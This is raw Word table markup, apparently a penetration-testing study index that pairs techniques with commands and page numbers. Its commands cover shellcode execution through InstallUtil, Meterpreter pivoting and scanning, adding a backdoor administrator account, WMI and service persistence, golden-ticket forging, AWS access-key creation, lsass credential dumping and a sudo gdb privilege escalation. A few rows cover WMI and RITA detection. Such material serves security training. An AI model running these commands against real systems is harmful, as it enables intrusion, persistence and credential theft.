          <w:p w14:paraId="42C98B92" w14:textId="057FAF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409EF9F8" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="491E0B40" w14:textId="7A3D48E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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14CC7BD9" w14:textId="0E6E017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A18716" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2DE8647B" w14:textId="1C233B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DefenderCheck</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B603EBA" w14:textId="7777777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6CDC8EA" w14:textId="560D32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7F8F3B96" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42C814CF" w14:textId="0EAFBA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Evation through Code wrapping and Obfuscation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10D31D6C" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E1C7202" w14:textId="4FF4218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73941272" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34EDD743" w14:textId="068FE8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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68509266" w14:textId="63B8591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6EE58860" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12949355" w14:textId="59DC13B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Reuses tools and ultilities already permitted on the target system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E268FBB" w14:textId="323EC80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50E0CDC0" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="76ADBCFD" w14:textId="6AED72A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Microsoft.NET InstallUtil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="735C23A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InstallUtil /U shellcode.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F6FE014" w14:textId="2D8BC9D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F0F0310" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5B4223FA" w14:textId="32535C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w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>third party</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tools</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50FF7178"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UEBA logging and monitioring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E5935D1" w14:textId="66CB4A7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5385B06E" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DF55693" w14:textId="431D49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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47C1772E" w14:textId="1FF5BA9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12126CD3" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ACE48CC" w14:textId="2DA6F9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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B453F75" w14:textId="3104CFA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72F14CA" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67E5940C" w14:textId="79BF69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portfwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A592F26" w14:textId="209F49D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539A4C37" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="743D6B29" w14:textId="3F484C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route add 10.10.10.10/34 1  set RHOST 10.10.10.100  exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39F7620A" w14:textId="19E0362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164C0A0F" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="616ACABF" w14:textId="53A236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run arp_scanner -r 10.10.10.0/24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="559D214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 xml:space="preserve"> route add 10.10.10.0/24 1  use auxiliary/scanner/portscan/tcp  set RHOSTS 10.10.10.1,11,100  set PORTS 22,25,80,135,445,631  run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D36594D" w14:textId="4989BAAD"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190CACC0" w14:textId="35F39E8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3E83A595" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E2A9FC9" w14:textId="1109F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08D34243" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5B74160D" w14:textId="462B4E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netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8000 connectaddress=10.10.10.100 connectport=80  netstat -nato | findstr:8000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F2ABC9B" w14:textId="69CE785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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="63B38724" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BA1A6BC" w14:textId="067AC4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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FBBDDE6" w14:textId="30EBF78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0EF37E4A" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79545095" w14:textId="2ED3F4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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6764E5BA" w14:textId="6783BFE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2B027766" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2E408A71" w14:textId="495C9E3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LLMNR Link-Local Multicast Name Resolution  Responder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A0323BF" w14:textId="44669E5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0E6928E" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18AB5880" w14:textId="012D9D9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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BC08E8C" w14:textId="2FD484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39A88E1A" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="289108F6" w14:textId="4E0256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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DABE441" w14:textId="06F01F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73B565FB" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="12604806" w14:textId="4AAB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402415F" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11164326" w14:textId="2B421D4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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05D503E1" w14:textId="6F93B62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10EDC9B5" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1592DE10" w14:textId="69B1F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035D8468" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0D5FE75E" w14:textId="6A7F9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Create Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="333BC6FC" w14:textId="455913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meterpreter&gt; execute -f "net user /add assetmgtacct Att@ckerPssw"  execute -f "net localgroup administrator /add assetmgtacct"  execute -i -f "net user"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="174D701D" w14:textId="33DC185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03864985" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35AD42BA" w14:textId="3CB7EB6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msf6&gt; use exploit/windows/local/persistence_service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="516591B6" w14:textId="1D9DFE9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3F17BC9C" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="51BF3747" w14:textId="76CEFB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mofcomp vmi.mof</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FB86EF8" w14:textId="3CE5CD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use exploit/windows/local/wmi_persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5185E135" w14:textId="513DE4C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5E598676" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0CAB725C" w14:textId="7D84EE9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-Retrieves krbtgt user password (root of trust) hash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4294E7F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-Forges Ticket Granting Ticket using hash (Mimikatz/Impacket)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="659438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-Authenticates to any Kerbero service"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="284EE40D" w14:textId="025458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250E31AA" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B884252" w14:textId="6FC2DD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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32D83F0B" w14:textId="53C19C7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34B850BF" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2C940912" w14:textId="21C295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iam list-users</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="462CC7DD" w14:textId="3BA5863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awis iam list-access-key --user-name jsmith  aws iam create-access-key --user-name jsmith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EFC3856" w14:textId="459B45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B282179" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DFE6E1B" w14:textId="40E390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Defense</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44D2B68F" w14:textId="581A21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Get-WMIObject -Namespace root\Subscription -Class_EventFilter | fl -property query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62B260FE" w14:textId="70C4925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01B17945" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D98FBA5" w14:textId="75308A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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D4638E5" w14:textId="402FD31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0C5E5249" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10860850" w14:textId="6239FB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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02974C3A" w14:textId="05C253B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6410C3B3" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="54577D38" w14:textId="76C3D1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Use statistical threat identification to analyze data over time for threat hunting, used for offline network activity assessment (reads from Zeek logging data).  Works best with data over one or more days</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B6BB199" w14:textId="231CD6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0FC40209" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7230A56E" w14:textId="514407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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03224B59" w14:textId="4A3B2C4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6358D0F7" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D8EDF05" w14:textId="39F0BD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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5848A090" w14:textId="5B1F90B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23AC330" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="615585FF" w14:textId="63A1DB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show-long-connection -H mynetwork | head -15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B6536DD" w14:textId="65008BC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6AD651FD" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="735ED0AA" w14:textId="537CB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show-exploded-dns mynetwork | head -15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73B86D63" w14:textId="60FF71C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0ECA18C5" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B1439AB" w14:textId="72C792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config.yaml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02AD8C5C" w14:textId="42BD2F1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293D8AA4" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A24F65C" w14:textId="6D531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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26874BD3" w14:textId="6EC393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1019B1E2" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38FC78A4" w14:textId="561FB5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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E3A6820" w14:textId="5FFD12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E6E1365" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44C9DB81" w14:textId="197E6B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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CCC9D90" w14:textId="0ABA88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594C73A7" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0FEAFCDC" w14:textId="21DFEA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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:ind w:right="1748"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sudo -l  sudo gdb -q</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44F33E71" w14:textId="58EF19A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 xml:space="preserve"> shell  id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42AF4992" w14:textId="3113302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59A63BAE" w14:textId="02C2C0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1053EC71" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="64FDA7A8" w14:textId="262DC4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.\procdump64.exe -accepteula -ma lsass.exe lsass.dmp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4632DFBA" w14:textId="482A1A1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2250A843" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EA2700E" w14:textId="44E8903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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19303A4A" w14:textId="12387FE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64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="367C8BD7" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0B53C419" w14:textId="28F158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2075A4CB" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="630D90A5" w14:textId="4DE9CE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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44F25D52" w14:textId="31550B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7308A3F8" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
